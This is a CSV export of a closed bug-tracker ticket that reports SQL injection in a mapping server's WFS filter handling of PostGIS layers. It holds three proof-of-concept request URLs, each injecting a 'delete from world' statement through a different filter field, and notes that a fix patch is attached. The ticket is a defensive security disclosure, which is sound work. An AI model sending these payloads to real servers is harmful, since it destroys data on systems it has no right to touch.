id,summary,reporter,owner,description,type,status,priority,milestone,component,version,severity,resolution,keywords,cc
3874,Multiple SQL injections possible on PostGIS layers with a WFS FE filter,rouault,assefa,"I've been able to trigger a SQL injection with svn trunk when running the following WFS GetFeature request:
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world& FILTER=name ')); delete from world; select ((' msGeometry -90,-180 90,180
}}}
The 'delete from world' is run...

Also with the Literal of a PropertyIsLike:
{{{
http://127.0.0.1:8080/mapserv.cgi?map=pg.map&SERVICE=WFS& VERSION=1.1.0&REQUEST=GetFeature&TYPENAME=world& FILTER= name ')); delete from world; select name from world WHERE ((name LIKE ' msGeometry-90,-180 90,180
}}}

Also with the PropertyName:
{{{
map=pg.map&SERVICE=WFS&VERSION=1.1.0&REQUEST=GetFeature& TYPENAME=world&FILTER= name = 'a')); delete from world; select * from world where ((name amsGeometry-90,-180 90,180
}}}

FLTGetIsBetweenComparisonSQLExpresssion() seems to be unaffected as far as the UpperBound and LowerBound are concerned because of the following check:
{{{
aszBounds = msStringSplit(psFilterNode->psRightNode->pszValue, ';', &nBounds);
if (nBounds != 2)
  return NULL;
}}}
However there are perhaps more clever ways of exploiting it despite that.

The issue likely affects previous MS versions, and perhaps other backends, and perhaps other places in the code I haven't seen.

Attached a patch that fixes the issue, but it is not perfect. See comment in the patch.",defect,closed,normal,6.0.1 release,Security/Vulnerability (Private),svn-trunk (development),normal,fixed,,aboudreault assefa sdlime dmorissette pramsey colivier msmitherdc